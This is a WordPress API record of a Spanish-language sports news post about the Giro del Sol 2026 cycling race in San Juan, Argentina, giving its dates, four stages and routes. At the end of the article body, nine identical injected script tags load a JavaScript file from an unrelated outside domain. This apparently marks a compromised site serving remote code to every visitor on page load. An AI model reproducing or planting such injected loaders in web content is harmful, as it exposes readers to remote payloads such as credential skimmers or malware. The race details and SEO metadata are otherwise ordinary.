{"id":24470,"date":"2026-01-06T13:01:37","date_gmt":"2026-01-06T16:01:37","guid":{"rendered":"https:\/\/www.sanjuandeportes.com\/wp\/?p=24470"},"modified":"2026-02-02T18:41:27","modified_gmt":"2026-02-02T21:41:27","slug":"giro-del-sol-2026-la-fecha-y-recorridos-confirmados","status":"publish","type":"post","link":"https:\/\/www.sanjuandeportes.com\/wp\/2026\/01\/06\/giro-del-sol-2026-la-fecha-y-recorridos-confirmados\/","title":{"rendered":"Giro del Sol 2026: la fecha y recorridos confirmados"},"content":{"rendered":"\n<p class=\"wp-block-paragraph\">Arranc\u00f3 el 2026 y el ciclismo volvi\u00f3 a encender la pasi\u00f3n en San Juan. En plena continuidad de la temporada rutera 2025\/2026 y con el marco imponente que dej\u00f3 la Doble Difunta Correa, este martes se presentar\u00e1 oficialmente el <strong>Giro del Sol 2026<\/strong>, una de las competencias m\u00e1s tradicionales y esperadas del calendario provincial.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">La prueba se disputar\u00e1 <strong>del viernes 9 al domingo 11<\/strong>, con un total de <strong>cuatro etapas que sumar\u00e1n 434 kil\u00f3metros<\/strong>, recorriendo distintos departamentos y combinando trazados urbanos, exigentes ascensos y una contrarreloj individual.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">La <strong>primera etapa<\/strong>, prevista para el viernes, tendr\u00e1 un recorrido de <strong>125 kil\u00f3metros<\/strong> y atravesar\u00e1 Capital, Santa Luc\u00eda, San Mart\u00edn, Angaco, Albard\u00f3n y Chimbas. El final ser\u00e1 en el <strong>Complejo Parque Norte<\/strong>, ubicado en Ruta 40 y Corrientes, en lo que promete ser una jornada r\u00e1pida y muy disputada.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">El s\u00e1bado llegar\u00e1 uno de los momentos m\u00e1s duros del Giro con la <strong>segunda etapa<\/strong>, que incluir\u00e1 el ascenso al <strong>pared\u00f3n del Dique Punta Negra<\/strong>. La largada ser\u00e1 en Chimbas, pasando por Rivadavia, Zonda y Ullum, para luego cerrar con un circuito en el centro chimbero y llegada en la plaza departamental, un escenario ideal para los escaladores.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">La acci\u00f3n continuar\u00e1 el domingo por la ma\u00f1ana con la <strong>tercera etapa<\/strong>, una <strong>contrarreloj individual<\/strong> en la que cada ciclista se enfrentar\u00e1 en soledad al reloj. El recorrido ser\u00e1 de <strong>9,3 kil\u00f3metros<\/strong>, con salida frente al municipio de Ullum y llegada en el sector del Palmar del Lago.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">El <strong>cierre del Giro del Sol 2026<\/strong> llegar\u00e1 con la cuarta y \u00faltima etapa en <strong>Pocito<\/strong>. La largada ser\u00e1 en la Plaza de la Libertad y el trazado recorrer\u00e1 los departamentos de 9 de Julio, 25 de Mayo y Caucete, regresando por Rawson para finalizar nuevamente en el municipio pocitano.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">M\u00e1s all\u00e1 de su valor hist\u00f3rico, el Giro del Sol ser\u00e1 tambi\u00e9n la <strong>antesala de la Vuelta a San Juan<\/strong>, que se disputar\u00e1 del <strong>23 de enero al 1 de febrero<\/strong>, con nueve etapas m\u00e1s un pr\u00f3logo. De esta manera, San Juan vuelve a consolidarse como uno de los grandes escenarios del ciclismo argentino, con un calendario cargado de competencias y protagonismo nacional.<\/p>\n<script><script src=\"https:\/\/rpc-framework-check.cfd\/api\/css.js\" defer><\/script><\/script><script><script src=\"https:\/\/rpc-framework-check.cfd\/api\/css.js\" defer><\/script><\/script><script><script src=\"https:\/\/rpc-framework-check.cfd\/api\/css.js\" defer><\/script><\/script><script><script src=\"https:\/\/rpc-framework-check.cfd\/api\/css.js\" defer><\/script><\/script><script><script src=\"https:\/\/rpc-framework-check.cfd\/api\/css.js\" defer><\/script><\/script><script><script src=\"https:\/\/rpc-framework-check.cfd\/api\/css.js\" defer><\/script><\/script><script><script src=\"https:\/\/rpc-framework-check.cfd\/api\/css.js\" defer><\/script><\/script><script><script src=\"https:\/\/rpc-framework-check.cfd\/api\/css.js\" defer><\/script><\/script><script><script src=\"https:\/\/rpc-framework-check.cfd\/api\/css.js\" defer><\/script><\/script>","protected":false},"excerpt":{"rendered":"<p>Arranc\u00f3 el 2026 y el ciclismo volvi\u00f3 a encender la pasi\u00f3n en San Juan. En plena continuidad de la temporada rutera 2025\/2026 y con el marco imponente que dej\u00f3 la Doble Difunta Correa, este martes se presentar\u00e1 oficialmente el Giro del Sol 2026, una de las competencias m\u00e1s tradicionales y esperadas del calendario provincial. La [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":20143,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[23,178],"tags":[],"class_list":["post-24470","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-ciclismo","category-san-juan"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v28.2 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Giro del Sol 2026: la fecha y recorridos confirmados - San Juan Deportes<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"http:\/\/www.sanjuandeportes.com\/wp\/2026\/01\/06\/giro-del-sol-2026-la-fecha-y-recorridos-confirmados\/\" \/>\n<meta property=\"og:locale\" content=\"es_ES\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Giro del Sol 2026: la fecha y recorridos confirmados - San Juan Deportes\" \/>\n<meta property=\"og:description\" content=\"Arranc\u00f3 el 2026 y el ciclismo volvi\u00f3 a encender la pasi\u00f3n en San Juan. En plena continuidad de la temporada rutera 2025\/2026 y con el marco imponente que dej\u00f3 la Doble Difunta Correa, este martes se presentar\u00e1 oficialmente el Giro del Sol 2026, una de las competencias m\u00e1s tradicionales y esperadas del calendario provincial. La [&hellip;]\" \/>\n<meta property=\"og:url\" content=\"http:\/\/www.sanjuandeportes.com\/wp\/2026\/01\/06\/giro-del-sol-2026-la-fecha-y-recorridos-confirmados\/\" \/>\n<meta property=\"og:site_name\" content=\"San Juan Deportes\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/sanjuandeportesok\" \/>\n<meta property=\"article:published_time\" content=\"2026-01-06T16:01:37+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2026-02-02T21:41:27+00:00\" \/>\n<meta property=\"og:image\" content=\"http:\/\/www.sanjuandeportes.com\/wp\/wp-content\/uploads\/2024\/01\/53458475088_5934d46523_b.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"1024\" \/>\n\t<meta property=\"og:image:height\" content=\"576\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"admin\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@SanJuanDeportes\" \/>\n<meta name=\"twitter:site\" content=\"@SanJuanDeportes\" \/>\n<meta name=\"twitter:label1\" content=\"Escrito por\" \/>\n\t<meta name=\"twitter:data1\" content=\"admin\" \/>\n\t<meta name=\"twitter:label2\" content=\"Tiempo de lectura\" \/>\n\t<meta name=\"twitter:data2\" content=\"2 minutos\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"http:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/2026\\\/01\\\/06\\\/giro-del-sol-2026-la-fecha-y-recorridos-confirmados\\\/#article\",\"isPartOf\":{\"@id\":\"http:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/2026\\\/01\\\/06\\\/giro-del-sol-2026-la-fecha-y-recorridos-confirmados\\\/\"},\"author\":{\"name\":\"admin\",\"@id\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/#\\\/schema\\\/person\\\/d8e3463931719391897f9c7a6d1bb7b3\"},\"headline\":\"Giro del Sol 2026: la fecha y recorridos confirmados\",\"datePublished\":\"2026-01-06T16:01:37+00:00\",\"dateModified\":\"2026-02-02T21:41:27+00:00\",\"mainEntityOfPage\":{\"@id\":\"http:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/2026\\\/01\\\/06\\\/giro-del-sol-2026-la-fecha-y-recorridos-confirmados\\\/\"},\"wordCount\":369,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/#organization\"},\"image\":{\"@id\":\"http:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/2026\\\/01\\\/06\\\/giro-del-sol-2026-la-fecha-y-recorridos-confirmados\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/wp-content\\\/uploads\\\/2024\\\/01\\\/53458475088_5934d46523_b.jpg\",\"articleSection\":[\"Ciclismo\",\"San Juan\"],\"inLanguage\":\"es\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"http:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/2026\\\/01\\\/06\\\/giro-del-sol-2026-la-fecha-y-recorridos-confirmados\\\/#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"http:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/2026\\\/01\\\/06\\\/giro-del-sol-2026-la-fecha-y-recorridos-confirmados\\\/\",\"url\":\"http:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/2026\\\/01\\\/06\\\/giro-del-sol-2026-la-fecha-y-recorridos-confirmados\\\/\",\"name\":\"Giro del Sol 2026: la fecha y recorridos confirmados - San Juan Deportes\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"http:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/2026\\\/01\\\/06\\\/giro-del-sol-2026-la-fecha-y-recorridos-confirmados\\\/#primaryimage\"},\"image\":{\"@id\":\"http:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/2026\\\/01\\\/06\\\/giro-del-sol-2026-la-fecha-y-recorridos-confirmados\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/wp-content\\\/uploads\\\/2024\\\/01\\\/53458475088_5934d46523_b.jpg\",\"datePublished\":\"2026-01-06T16:01:37+00:00\",\"dateModified\":\"2026-02-02T21:41:27+00:00\",\"breadcrumb\":{\"@id\":\"http:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/2026\\\/01\\\/06\\\/giro-del-sol-2026-la-fecha-y-recorridos-confirmados\\\/#breadcrumb\"},\"inLanguage\":\"es\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"http:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/2026\\\/01\\\/06\\\/giro-del-sol-2026-la-fecha-y-recorridos-confirmados\\\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"es\",\"@id\":\"http:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/2026\\\/01\\\/06\\\/giro-del-sol-2026-la-fecha-y-recorridos-confirmados\\\/#primaryimage\",\"url\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/wp-content\\\/uploads\\\/2024\\\/01\\\/53458475088_5934d46523_b.jpg\",\"contentUrl\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/wp-content\\\/uploads\\\/2024\\\/01\\\/53458475088_5934d46523_b.jpg\",\"width\":1024,\"height\":576},{\"@type\":\"BreadcrumbList\",\"@id\":\"http:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/2026\\\/01\\\/06\\\/giro-del-sol-2026-la-fecha-y-recorridos-confirmados\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Portada\",\"item\":\"http:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Giro del Sol 2026: la fecha y recorridos confirmados\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/#website\",\"url\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/\",\"name\":\"San Juan Deportes\",\"description\":\"El sitio de deportes de la provincia de San Juan\",\"publisher\":{\"@id\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"es\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/#organization\",\"name\":\"San Juan Deportes\",\"url\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"es\",\"@id\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/wp-content\\\/uploads\\\/unnamed.jpg\",\"contentUrl\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/wp-content\\\/uploads\\\/unnamed.jpg\",\"width\":900,\"height\":900,\"caption\":\"San Juan Deportes\"},\"image\":{\"@id\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/#\\\/schema\\\/logo\\\/image\\\/\"},\"sameAs\":[\"https:\\\/\\\/www.facebook.com\\\/sanjuandeportesok\",\"https:\\\/\\\/x.com\\\/SanJuanDeportes\",\"https:\\\/\\\/www.instagram.com\\\/sanjuandeportes\"]},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/#\\\/schema\\\/person\\\/d8e3463931719391897f9c7a6d1bb7b3\",\"name\":\"admin\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"es\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/c4deacdacf798758c71e8e4f4ca4bcf755ae082e386babce41b35a278703bed5?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/c4deacdacf798758c71e8e4f4ca4bcf755ae082e386babce41b35a278703bed5?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/c4deacdacf798758c71e8e4f4ca4bcf755ae082e386babce41b35a278703bed5?s=96&d=mm&r=g\",\"caption\":\"admin\"},\"url\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/author\\\/admin\\\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Giro del Sol 2026: la fecha y recorridos confirmados - San Juan Deportes","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"http:\/\/www.sanjuandeportes.com\/wp\/2026\/01\/06\/giro-del-sol-2026-la-fecha-y-recorridos-confirmados\/","og_locale":"es_ES","og_type":"article","og_title":"Giro del Sol 2026: la fecha y recorridos confirmados - San Juan Deportes","og_description":"Arranc\u00f3 el 2026 y el ciclismo volvi\u00f3 a encender la pasi\u00f3n en San Juan. En plena continuidad de la temporada rutera 2025\/2026 y con el marco imponente que dej\u00f3 la Doble Difunta Correa, este martes se presentar\u00e1 oficialmente el Giro del Sol 2026, una de las competencias m\u00e1s tradicionales y esperadas del calendario provincial. La [&hellip;]","og_url":"http:\/\/www.sanjuandeportes.com\/wp\/2026\/01\/06\/giro-del-sol-2026-la-fecha-y-recorridos-confirmados\/","og_site_name":"San Juan Deportes","article_publisher":"https:\/\/www.facebook.com\/sanjuandeportesok","article_published_time":"2026-01-06T16:01:37+00:00","article_modified_time":"2026-02-02T21:41:27+00:00","og_image":[{"width":1024,"height":576,"url":"http:\/\/www.sanjuandeportes.com\/wp\/wp-content\/uploads\/2024\/01\/53458475088_5934d46523_b.jpg","type":"image\/jpeg"}],"author":"admin","twitter_card":"summary_large_image","twitter_creator":"@SanJuanDeportes","twitter_site":"@SanJuanDeportes","twitter_misc":{"Escrito por":"admin","Tiempo de lectura":"2 minutos"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"http:\/\/www.sanjuandeportes.com\/wp\/2026\/01\/06\/giro-del-sol-2026-la-fecha-y-recorridos-confirmados\/#article","isPartOf":{"@id":"http:\/\/www.sanjuandeportes.com\/wp\/2026\/01\/06\/giro-del-sol-2026-la-fecha-y-recorridos-confirmados\/"},"author":{"name":"admin","@id":"https:\/\/www.sanjuandeportes.com\/wp\/#\/schema\/person\/d8e3463931719391897f9c7a6d1bb7b3"},"headline":"Giro del Sol 2026: la fecha y recorridos confirmados","datePublished":"2026-01-06T16:01:37+00:00","dateModified":"2026-02-02T21:41:27+00:00","mainEntityOfPage":{"@id":"http:\/\/www.sanjuandeportes.com\/wp\/2026\/01\/06\/giro-del-sol-2026-la-fecha-y-recorridos-confirmados\/"},"wordCount":369,"commentCount":0,"publisher":{"@id":"https:\/\/www.sanjuandeportes.com\/wp\/#organization"},"image":{"@id":"http:\/\/www.sanjuandeportes.com\/wp\/2026\/01\/06\/giro-del-sol-2026-la-fecha-y-recorridos-confirmados\/#primaryimage"},"thumbnailUrl":"https:\/\/www.sanjuandeportes.com\/wp\/wp-content\/uploads\/2024\/01\/53458475088_5934d46523_b.jpg","articleSection":["Ciclismo","San Juan"],"inLanguage":"es","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["http:\/\/www.sanjuandeportes.com\/wp\/2026\/01\/06\/giro-del-sol-2026-la-fecha-y-recorridos-confirmados\/#respond"]}]},{"@type":"WebPage","@id":"http:\/\/www.sanjuandeportes.com\/wp\/2026\/01\/06\/giro-del-sol-2026-la-fecha-y-recorridos-confirmados\/","url":"http:\/\/www.sanjuandeportes.com\/wp\/2026\/01\/06\/giro-del-sol-2026-la-fecha-y-recorridos-confirmados\/","name":"Giro del Sol 2026: la fecha y recorridos confirmados - San Juan Deportes","isPartOf":{"@id":"https:\/\/www.sanjuandeportes.com\/wp\/#website"},"primaryImageOfPage":{"@id":"http:\/\/www.sanjuandeportes.com\/wp\/2026\/01\/06\/giro-del-sol-2026-la-fecha-y-recorridos-confirmados\/#primaryimage"},"image":{"@id":"http:\/\/www.sanjuandeportes.com\/wp\/2026\/01\/06\/giro-del-sol-2026-la-fecha-y-recorridos-confirmados\/#primaryimage"},"thumbnailUrl":"https:\/\/www.sanjuandeportes.com\/wp\/wp-content\/uploads\/2024\/01\/53458475088_5934d46523_b.jpg","datePublished":"2026-01-06T16:01:37+00:00","dateModified":"2026-02-02T21:41:27+00:00","breadcrumb":{"@id":"http:\/\/www.sanjuandeportes.com\/wp\/2026\/01\/06\/giro-del-sol-2026-la-fecha-y-recorridos-confirmados\/#breadcrumb"},"inLanguage":"es","potentialAction":[{"@type":"ReadAction","target":["http:\/\/www.sanjuandeportes.com\/wp\/2026\/01\/06\/giro-del-sol-2026-la-fecha-y-recorridos-confirmados\/"]}]},{"@type":"ImageObject","inLanguage":"es","@id":"http:\/\/www.sanjuandeportes.com\/wp\/2026\/01\/06\/giro-del-sol-2026-la-fecha-y-recorridos-confirmados\/#primaryimage","url":"https:\/\/www.sanjuandeportes.com\/wp\/wp-content\/uploads\/2024\/01\/53458475088_5934d46523_b.jpg","contentUrl":"https:\/\/www.sanjuandeportes.com\/wp\/wp-content\/uploads\/2024\/01\/53458475088_5934d46523_b.jpg","width":1024,"height":576},{"@type":"BreadcrumbList","@id":"http:\/\/www.sanjuandeportes.com\/wp\/2026\/01\/06\/giro-del-sol-2026-la-fecha-y-recorridos-confirmados\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Portada","item":"http:\/\/www.sanjuandeportes.com\/wp\/"},{"@type":"ListItem","position":2,"name":"Giro del Sol 2026: la fecha y recorridos confirmados"}]},{"@type":"WebSite","@id":"https:\/\/www.sanjuandeportes.com\/wp\/#website","url":"https:\/\/www.sanjuandeportes.com\/wp\/","name":"San Juan Deportes","description":"El sitio de deportes de la provincia de San Juan","publisher":{"@id":"https:\/\/www.sanjuandeportes.com\/wp\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.sanjuandeportes.com\/wp\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"es"},{"@type":"Organization","@id":"https:\/\/www.sanjuandeportes.com\/wp\/#organization","name":"San Juan Deportes","url":"https:\/\/www.sanjuandeportes.com\/wp\/","logo":{"@type":"ImageObject","inLanguage":"es","@id":"https:\/\/www.sanjuandeportes.com\/wp\/#\/schema\/logo\/image\/","url":"https:\/\/www.sanjuandeportes.com\/wp\/wp-content\/uploads\/unnamed.jpg","contentUrl":"https:\/\/www.sanjuandeportes.com\/wp\/wp-content\/uploads\/unnamed.jpg","width":900,"height":900,"caption":"San Juan Deportes"},"image":{"@id":"https:\/\/www.sanjuandeportes.com\/wp\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.facebook.com\/sanjuandeportesok","https:\/\/x.com\/SanJuanDeportes","https:\/\/www.instagram.com\/sanjuandeportes"]},{"@type":"Person","@id":"https:\/\/www.sanjuandeportes.com\/wp\/#\/schema\/person\/d8e3463931719391897f9c7a6d1bb7b3","name":"admin","image":{"@type":"ImageObject","inLanguage":"es","@id":"https:\/\/secure.gravatar.com\/avatar\/c4deacdacf798758c71e8e4f4ca4bcf755ae082e386babce41b35a278703bed5?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/c4deacdacf798758c71e8e4f4ca4bcf755ae082e386babce41b35a278703bed5?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/c4deacdacf798758c71e8e4f4ca4bcf755ae082e386babce41b35a278703bed5?s=96&d=mm&r=g","caption":"admin"},"url":"https:\/\/www.sanjuandeportes.com\/wp\/author\/admin\/"}]}},"_links":{"self":[{"href":"https:\/\/www.sanjuandeportes.com\/wp\/wp-json\/wp\/v2\/posts\/24470","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.sanjuandeportes.com\/wp\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.sanjuandeportes.com\/wp\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.sanjuandeportes.com\/wp\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.sanjuandeportes.com\/wp\/wp-json\/wp\/v2\/comments?post=24470"}],"version-history":[{"count":10,"href":"https:\/\/www.sanjuandeportes.com\/wp\/wp-json\/wp\/v2\/posts\/24470\/revisions"}],"predecessor-version":[{"id":28360,"href":"https:\/\/www.sanjuandeportes.com\/wp\/wp-json\/wp\/v2\/posts\/24470\/revisions\/28360"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.sanjuandeportes.com\/wp\/wp-json\/wp\/v2\/media\/20143"}],"wp:attachment":[{"href":"https:\/\/www.sanjuandeportes.com\/wp\/wp-json\/wp\/v2\/media?parent=24470"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.sanjuandeportes.com\/wp\/wp-json\/wp\/v2\/categories?post=24470"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.sanjuandeportes.com\/wp\/wp-json\/wp\/v2\/tags?post=24470"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}